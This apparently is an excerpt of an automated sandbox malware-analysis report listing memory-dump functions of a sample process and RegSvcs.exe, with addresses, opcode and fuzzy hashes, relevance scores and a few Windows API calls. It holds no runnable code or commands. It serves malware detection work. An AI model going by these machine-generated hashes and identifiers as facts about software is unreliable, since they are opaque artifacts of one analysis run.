Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 441eccb91653066c78aafd660759fc7426aa996feadc6b6e46925d7cea9a05f8
Instruction ID: e599fe23f3f74e51eee5e327c860b3b6e7385183cd767973a3c559960c700fc1
Opcode Fuzzy Hash: 441eccb91653066c78aafd660759fc7426aa996feadc6b6e46925d7cea9a05f8
Instruction Fuzzy Hash: 0511C5B5800349DFDB50DF9AD585BDEBBF8EB48310F208419E558A7250C379A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D39854 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

Teq, xrefs: 06D3A6A1

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: f611459f2a9436531049416e600f5f828838c0ccedc4ca6fb3b50ec4bac755df
Instruction ID: 1c11480ebd59085ae64ffb771999036b3769365f06f261a06fdaa638de0a850e
Opcode Fuzzy Hash: f611459f2a9436531049416e600f5f828838c0ccedc4ca6fb3b50ec4bac755df
Instruction Fuzzy Hash: 1751B271B006158FDB10DB79D8449BEB7F6EFC4320B19852AE469DB391EB30DC058791

Uniqueness

Uniqueness Score: -1.00%

Function 06D39B88 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

LRq, xrefs: 06D39BF3

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 831e0818a6bb833ea92f271768c7427cce9ef5ab0a356ba3b3d1591f18737c5b
Instruction ID: ae86e541f9022e07e283e040e4d4ac08e0e2b66aa7ff4a36fd42f6e220444f91
Opcode Fuzzy Hash: 831e0818a6bb833ea92f271768c7427cce9ef5ab0a356ba3b3d1591f18737c5b
Instruction Fuzzy Hash: 91410374E046188FDB18DFA9D495AEEBBF2FB98310F109129E415BB354EB345941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06D3A460 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Teq, xrefs: 06D3A4CB

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 120abfca728ab6c4509144b8c10c716e5da14b9e9c8d24f64cb6ad02a651eb0e
Instruction ID: 026c20ca9568f84cc9b4ab4502af80c3b618fd2c6f8535e0ec8ab14e2451b08b
Opcode Fuzzy Hash: 120abfca728ab6c4509144b8c10c716e5da14b9e9c8d24f64cb6ad02a651eb0e
Instruction Fuzzy Hash: 8B112772F002198BCF94EBB998116FEBBF6AF88311B244069C555EB244EF35CD15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D3AD08 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdfc2312dffbe371c2b16f79ecc1b0ae7e4bd4fa79719e99b0a9d7abf945269b
Instruction ID: e023b6c4469189697d7829b5b7af1571cae2e4d4623f5bfd0958e09ee42d892f
Opcode Fuzzy Hash: cdfc2312dffbe371c2b16f79ecc1b0ae7e4bd4fa79719e99b0a9d7abf945269b
Instruction Fuzzy Hash: FF613871A00619DFDB54DFA8C894A9DBBB1FF88310F248159E849AB360DB71ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06D38D60 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcdf5c983df7db4557d58a1f45f89f7a4b0f0bd6957fa1ab2f414d5ed246c462
Instruction ID: f859a1c71248b0514a44e42a19092b7d2aafa7a4d69016a76ca69d13583cbe08
Opcode Fuzzy Hash: dcdf5c983df7db4557d58a1f45f89f7a4b0f0bd6957fa1ab2f414d5ed246c462
Instruction Fuzzy Hash: 0B510074E04618AFDB59DFA8D884AAEBBF2FF89310F109029E805BB355CB349945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06D3FC58 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c8e6f439296e79bbcbf9fbc5b2d2bb8c3a31618c53cea24cbcad5dddb3d092
Instruction ID: 0334149d639f498580a0a6a85f252eea87e69cce92c3dd1a3ab3254436ebe2f4
Opcode Fuzzy Hash: c0c8e6f439296e79bbcbf9fbc5b2d2bb8c3a31618c53cea24cbcad5dddb3d092
Instruction Fuzzy Hash: 89410874D0821D8FEB44CFAAD5486EEBBF6EB8C301F14D069D859A7251D7309941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06D38B48 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107bf8d305c6bf3f7ea3d5a0131ecb00675d1dfcde613dd26f8269d9534c80ab
Instruction ID: 282e409d0615b1b2421331e9ec87df96660756d24ee86b83d18d5ac6c49266ad
Opcode Fuzzy Hash: 107bf8d305c6bf3f7ea3d5a0131ecb00675d1dfcde613dd26f8269d9534c80ab
Instruction Fuzzy Hash: 6141DF74E112189FDB00DFA8D885AEEBBF2FB48320F14A559E804B7355DB35A994CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06D3CD60 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da43c346bf871e212be0172f82c04714227235d6c6fbfe8166365af250d771e4
Instruction ID: aca36b718ebc05a88c64457754500fc02398fc0238754c2df6760f2b577a31e8
Opcode Fuzzy Hash: da43c346bf871e212be0172f82c04714227235d6c6fbfe8166365af250d771e4
Instruction Fuzzy Hash: 6B411574E102199FDB54DFA9D485AAEBBF1EF89310F14846AE815FB350DB31E902CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06D38838 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f204391db7bb0ff0e4f398e21a4630faaf441274b5fa72306ddd4e66a6ea2900
Instruction ID: 37983d0f2b44da7b0c206cea42a1ea14a2ba027fdfa5798d85fb757c5a27e960
Opcode Fuzzy Hash: f204391db7bb0ff0e4f398e21a4630faaf441274b5fa72306ddd4e66a6ea2900
Instruction Fuzzy Hash: 90312774E002099FDB15DFA8E881AEEBBB1FF88310F109525E914AB354DB709A41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1265519604.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_c3d000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061b27b8280c607a437dd39b9d4170aef6aae35013125015f5ad706703d4b832
Instruction ID: ec743c6e6c08ca6d13d3d9314c61f3e77a3597848139d66fb09bcb669d25ae3b
Opcode Fuzzy Hash: 061b27b8280c607a437dd39b9d4170aef6aae35013125015f5ad706703d4b832
Instruction Fuzzy Hash: B921F5B2514240EFDB15DF14E9C0B26BF65FB88318F24C569E90A0F256C336D956CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C4D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1265588293.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_c4d000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa787ae4518212faab0ab1ac8a75d304c977f7bcca2c1b68ee4eb4b708e8cec3
Instruction ID: f62cd9810e52622fa652d32f8769eca767570ed75e50d00a5717f2ff8b42effb
Opcode Fuzzy Hash: aa787ae4518212faab0ab1ac8a75d304c977f7bcca2c1b68ee4eb4b708e8cec3
Instruction Fuzzy Hash: 7521C275604344EFDB24EF24D9C4B26BB65FB84314F24C5ADE90A4B296C33AD847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 06D38550 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ed8cf79dbf78b2322374f9e75d40bf038912c063b5fda96254802231c77151
Instruction ID: 2f28aae6379879f636c4d6a9cb08c7822120487a0d863d830c2533fe2e3f6f74
Opcode Fuzzy Hash: c6ed8cf79dbf78b2322374f9e75d40bf038912c063b5fda96254802231c77151
Instruction Fuzzy Hash: E231E570A11908DFC754DF99E68599DBBF1FF88310B6191D4E449AB369EB30AE10DB00

Uniqueness

Uniqueness Score: -1.00%

Function 06D3A6F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9457b78811e11bebe6b20ef65147c4418515b52522f4143c603ba30fbc48c354
Instruction ID: 760f699a071160f8107ef529684c5f662aaddbcd60d0a0a11e615491f0794262
Opcode Fuzzy Hash: 9457b78811e11bebe6b20ef65147c4418515b52522f4143c603ba30fbc48c354
Instruction Fuzzy Hash: C821B3B0D11358DFDB60CF9AC984B8EBFF5AB48714F24801AE444BB294C7B95845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 06D3B9F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb814bce0e3dadfd6fe5f6a77c3cf85a78c024ebc361445a5959dcf57600491e
Instruction ID: 74f722a441cd925fabc0e39efbbc12918b3a643934b5437c12e72a4771bdbe09
Opcode Fuzzy Hash: cb814bce0e3dadfd6fe5f6a77c3cf85a78c024ebc361445a5959dcf57600491e
Instruction Fuzzy Hash: 271104B2F04308AFDB45DF74CC19A6E77F9DB95204B2444EB9809C7341E930DD068721

Uniqueness

Uniqueness Score: -1.00%

Function 00C4D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1265588293.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_c4d000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba31d8fa3d1e25f00525da0f892df0b3f95c086c6a39bdddb5d597851cdbd6e
Instruction ID: 06332832f491d14e482fd3880b12a83f6adcf2a059f7ecba23198c649e3ffd53
Opcode Fuzzy Hash: 0ba31d8fa3d1e25f00525da0f892df0b3f95c086c6a39bdddb5d597851cdbd6e
Instruction Fuzzy Hash: E8218E755093809FCB16DF20D994715BF71FB46314F28C5EAD8498F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 06D39AFC Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aacdc8ad33062b3bb680aa8d02b386d09fffd27f21a1fdb5881502e4462b6436
Instruction ID: 7d13ef831c6459388b1f257dc13c36c416389aaa9a7449ce311065e3c424dbb0
Opcode Fuzzy Hash: aacdc8ad33062b3bb680aa8d02b386d09fffd27f21a1fdb5881502e4462b6436
Instruction Fuzzy Hash: A8114F71D1075B9ACF41EFB9C8550EDFBB0FF85310B108A1AE558B7100EB70A689CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06D3FDD0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3493a8c6cf692ebde0b8bc94bd12609bdbc8d1b0d9f2aa43e8e46101ef001e55
Instruction ID: ebe26ddd4d0220468d81bc38c9bbe33c0069f12d5b31a6461cf631d09049e459
Opcode Fuzzy Hash: 3493a8c6cf692ebde0b8bc94bd12609bdbc8d1b0d9f2aa43e8e46101ef001e55
Instruction Fuzzy Hash: 0321B6B4E0421DDFDB84CFA9C1819AEBBF5EB48300F609469D809B7716D7709A41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06D3BA54 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ba04173f4bbfe9e6340f873b16da332510b6700c8a1c9a61d70cce706c808e
Instruction ID: 2570b73b12665f4366ff9bb1d35eee3bc20b9c016591d768fc3941e2b1e7e33a
Opcode Fuzzy Hash: b6ba04173f4bbfe9e6340f873b16da332510b6700c8a1c9a61d70cce706c808e
Instruction Fuzzy Hash: 0A21C2B5D04359DFDB20CF9AD884ADEBBF4FB48310F10841AE919A7210C379A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1265519604.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_c3d000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: a355e6a5c7e5ef931ae9d3d7dcd042f1f0e5f0f218cfb273da70eb89972ffc4d
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 8911D3B6504280DFCB16CF10E5C4B16BF71FB94314F24C6A9D84A0B656C336D956CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 06D3FE80 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a744745d29dc549f334d7900a7d0f675aca8812bff24998038b5b6e6adea300
Instruction ID: 1617535660a2de9083aae648cf063e508115c889eab60d093a67bc0af07f46b2
Opcode Fuzzy Hash: 5a744745d29dc549f334d7900a7d0f675aca8812bff24998038b5b6e6adea300
Instruction Fuzzy Hash: 8811E2B5E0831CDFDB84DFA9C5409AEBBF9EB48310F1495A59458E7316D770AA418F80

Uniqueness

Uniqueness Score: -1.00%

Function 06D386E8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab7c20c39d2a43f384f6846ed8f578c4446879cdadeb1abe7301c9f64ba52f9
Instruction ID: 79c37517a224df8ddc1792193ff5cd6b954b11c02d7e8719d221aa7bb3b69ea9
Opcode Fuzzy Hash: 6ab7c20c39d2a43f384f6846ed8f578c4446879cdadeb1abe7301c9f64ba52f9
Instruction Fuzzy Hash: 3B11E674A2190CDFC760DF98E189999BFF0FB48320F5250D5E889AB355DB30AAA0CB45

Uniqueness

Uniqueness Score: -1.00%

Function 06D3BA44 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6667f438f8a17ce6f9c251f6e6f3fbd36db6a450aa86391b14f4ea43162d92bd
Instruction ID: 0b813596653389853a6903a39e00969dd309bd60dc5b70f73fe0bb130585772d
Opcode Fuzzy Hash: 6667f438f8a17ce6f9c251f6e6f3fbd36db6a450aa86391b14f4ea43162d92bd
Instruction Fuzzy Hash: EFF0F672714328AFDF88DFB8E84599E7FBAEF84210B10846BE505D7220EA30DD048754

Uniqueness

Uniqueness Score: -1.00%

Function 06D39DE0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec7c81c244912124d7170ec5e6590d37ce12cb13e10218785b5eaa0f7e93ddd
Instruction ID: 54c3513fae9e0bd3b2e3759c7ac429335e233f2f16d0b831bb6a2d3c44a18562
Opcode Fuzzy Hash: eec7c81c244912124d7170ec5e6590d37ce12cb13e10218785b5eaa0f7e93ddd
Instruction Fuzzy Hash: 01F0A575E05208EFCB94DFA8D585A9DBBF5EB48310F10C0AAA819A7350E6719A51DF80

Uniqueness

Uniqueness Score: -1.00%

Function 06D3FF40 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d98ed02f047a0300ec7eb93174ba444f8ec59522e712d8cfe084d5c4bfa35e
Instruction ID: c14edbdcf74d7b4998362f23310ec308f740c7815f77dbc300723ee73c6c4912
Opcode Fuzzy Hash: 06d98ed02f047a0300ec7eb93174ba444f8ec59522e712d8cfe084d5c4bfa35e
Instruction Fuzzy Hash: 73F01EB0D0420CEFCB50DFA8D445AADBBB5EB09301F1080AAE848A3360DB309A84DF80

Uniqueness

Uniqueness Score: -1.00%

Function 06D390E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f358784ad1c8f1ac14d0fc6776f655dcec383634cdc0c434a5e674163de638f
Instruction ID: 48bcd28c684b39c570c0fd93d764e4fc2248bf077925e098f60ae0c16a8a6584
Opcode Fuzzy Hash: 8f358784ad1c8f1ac14d0fc6776f655dcec383634cdc0c434a5e674163de638f
Instruction Fuzzy Hash: 84E01A3690420CEFDB14DF94D9819ADBF75EB49320F20C099EC152B350DB729AA2EB80

Uniqueness

Uniqueness Score: -1.00%

Function 06D387F0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62974401ae2ff116ae73042e4c9b6e96350c910ed766127fdab19a1ecb95f3d
Instruction ID: e6fa238b997983314389437a95b6ac199e10f9fdc5e7cda388ca19716dc51974
Opcode Fuzzy Hash: e62974401ae2ff116ae73042e4c9b6e96350c910ed766127fdab19a1ecb95f3d
Instruction Fuzzy Hash: 70E04F7590420CFFCB44DF94E9419ACBF75EF45320F20C199EC4417350C6329A55EB80

Uniqueness

Uniqueness Score: -1.00%

Function 06D37320 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a8e137ab810826bec0dcdae846a64cf3cfecbe2be430ca31e46bc1ef8095730
Instruction ID: d524d4da2eee5e7a635a8624264c1d2bc66f6b3cf8c005c6d1f3b4870444e839
Opcode Fuzzy Hash: 5a8e137ab810826bec0dcdae846a64cf3cfecbe2be430ca31e46bc1ef8095730
Instruction Fuzzy Hash: 18E0C27180561CDFE760EFF0C94469E7BFCEB0A221F1045A9F98A83220EE304A40DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 06D38D18 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f6e4397e46c9d66f11eb0c23b7e928b16b2c7e199f4c10e32d095b64850d9f
Instruction ID: 5987fa4f908cb6488069355a7edd99f2103074a9944371adf68228202a82770f
Opcode Fuzzy Hash: 53f6e4397e46c9d66f11eb0c23b7e928b16b2c7e199f4c10e32d095b64850d9f
Instruction Fuzzy Hash: FDE08674D0420CEFC704DF94E5459ACBFB8EB95311F20C49AEC4417340C6719E51EB80

Uniqueness

Uniqueness Score: -1.00%

Function 06D386A8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf43bc5f68c530eb9935315c62e6f490c720c858bbf7e10ceaffd51080e9574f
Instruction ID: d84df3981606456f43cb515a73437bf7db0ec51c8f226ee98bc4f07b2ff8c072
Opcode Fuzzy Hash: bf43bc5f68c530eb9935315c62e6f490c720c858bbf7e10ceaffd51080e9574f
Instruction Fuzzy Hash: 9CE08C34A08208DBC704EFA4D98556CBBB8AB45314F2080A9980917350CA31AE42DB80

Uniqueness

Uniqueness Score: -1.00%

Function 06D301DF Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3740b66d8caf997d56b884c517e3851b300081025c1b56d2eca1ede8153309
Instruction ID: 84af3096da3387a492e2478ae41ec2fe8f78d0babd2141ec0f20072446fe039a
Opcode Fuzzy Hash: bb3740b66d8caf997d56b884c517e3851b300081025c1b56d2eca1ede8153309
Instruction Fuzzy Hash: AAD0A7712485D4CECF14DF60E6A52187B21FF02221F60456ED05982452C7244010CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06D301F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a7d2f73625686e1422a41aee88dee87fa793c1f0285c3aa57d96ff1ede0cd7
Instruction ID: 37b9100d9dc2822641b343e7b180be679e82589b27ee79c736d7cdf138ae1c72
Opcode Fuzzy Hash: 74a7d2f73625686e1422a41aee88dee87fa793c1f0285c3aa57d96ff1ede0cd7
Instruction Fuzzy Hash: A8C02B31009B0C8FE3701784A20D3303AFC4303132F00E000601E024310EB090C0C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 06D3EA50 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808bab28e6411d9a2f9298a640561eb9f3b95b3da4d6679126e3b8098a924b6d
Instruction ID: 4972c7e74c1dd06f533b3188723dd03930745ffdd09f14b657660729da5271a5
Opcode Fuzzy Hash: 808bab28e6411d9a2f9298a640561eb9f3b95b3da4d6679126e3b8098a924b6d
Instruction Fuzzy Hash: 3AC04C32451A888BD7296795A60E725BFB8EB11317F441421E64D415615EA05450CBA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 7636, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	151
Total number of Limit Nodes:	16

Executed Functions

Function 066A2E08 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066A2E86
GetCurrentThread.KERNEL32 ref: 066A2EC3
GetCurrentProcess.KERNEL32 ref: 066A2F00
GetCurrentThreadId.KERNEL32 ref: 066A2F59

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1e12009ec22c2a26a509d87a350dd2a1179e808f7a306db7ae49bad4f7ec807a
Instruction ID: 4bd26729e3dfd0b24af45b8a2201d5084bc3acfc87cb1f8e1606b6d6fc5d444f
Opcode Fuzzy Hash: 1e12009ec22c2a26a509d87a350dd2a1179e808f7a306db7ae49bad4f7ec807a
Instruction Fuzzy Hash: 9F5145B0900749CFEB94CFA9D948BAEBBF5FB88314F248059E419AB360D7346944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 066A2E03 Relevance: 6.1, APIs: 4, Instructions: 125
threadCOMMON

